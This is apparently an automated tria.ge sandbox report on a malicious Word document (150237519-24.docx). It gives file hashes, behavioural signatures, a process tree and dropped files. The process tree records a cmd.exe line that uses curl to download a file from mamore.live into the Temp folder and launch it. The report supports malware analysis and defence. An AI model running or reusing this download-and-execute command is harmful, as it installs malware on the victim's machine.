Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    66s
  • max time network
    37s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    02/06/2023, 17:18

General

  • Target

    150237519-24.docx

  • Size

    35KB

  • MD5

    caaebdc13817fd92ef517549a73cb408

  • SHA1

    773676e81c562f35fbadd81779ffe917928d9412

  • SHA256

    37bf0cb7a0ba17f159bc35d82c3f9182c58254cebf7ee830a4eb489ea1f1a557

  • SHA512

    63405c1ade718e186eaef47bb75204e75e395da21d2b565209a47bc28ca97ef183c5da5d43dc0e1a97167f1eca329a417346393603ed8c2275f734c9171e2d52

  • SSDEEP

    768:1oAB8Y59isUKZRcaVoLP8cGVUHRmGQs3Q:1HB8YDtBxoWVUHRIMQ

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\150237519-24.docx"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2036
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1996
      • C:\Windows\SysWOW64\verclsid.exe
        "C:\Windows\system32\verclsid.exe" /S /C {E88DCCE0-B7B3-11D1-A9F0-00AA0060FA31} /I {00000112-0000-0000-C000-000000000046} /X 0x5
        2⤵
        • Process spawned unexpected child process
        PID:860
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x4f8
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1760
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "for /f %i in ('curl -JOsw %{filename_effective} --output-dir C:\Users\Admin\AppData\Local\Temp https://mamore.live/MSP951L') do set L=%i&cmd /c start /B C:\Users\Admin\AppData\Local\Temp\%L%"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:604
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl -JOsw %{filename_effective} --output-dir C:\Users\Admin\AppData\Local\Temp https://mamore.live/MSP951L
        2⤵
          PID:556

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AD079B86.emf

        Filesize

        5KB

        MD5

        b2f1d858ea270975929657d05ed78b34

        SHA1

        20c869ae14094cda8258fefc00711b6627c4e2a9

        SHA256

        023fe4ba4251320e0aeb0391dbd0bc993150442adfd09ecb90880d0d016d1d73

        SHA512

        ffc7a0d43d11c355eb05ea9e3fe50a7f4fa3de2fe17e805267c41ed2933702489efba8979b180bdd64e53fab2555aa594b14ad6b2c4b039f3e43e7cbbf452e4c

      • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

        Filesize

        2B

        MD5

        f3b25701fe362ec84616a93a45ce9998

        SHA1

        d62636d8caec13f04e28442a0a6fa1afeb024bbb

        SHA256

        b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

        SHA512

        98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

      • memory/2036-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB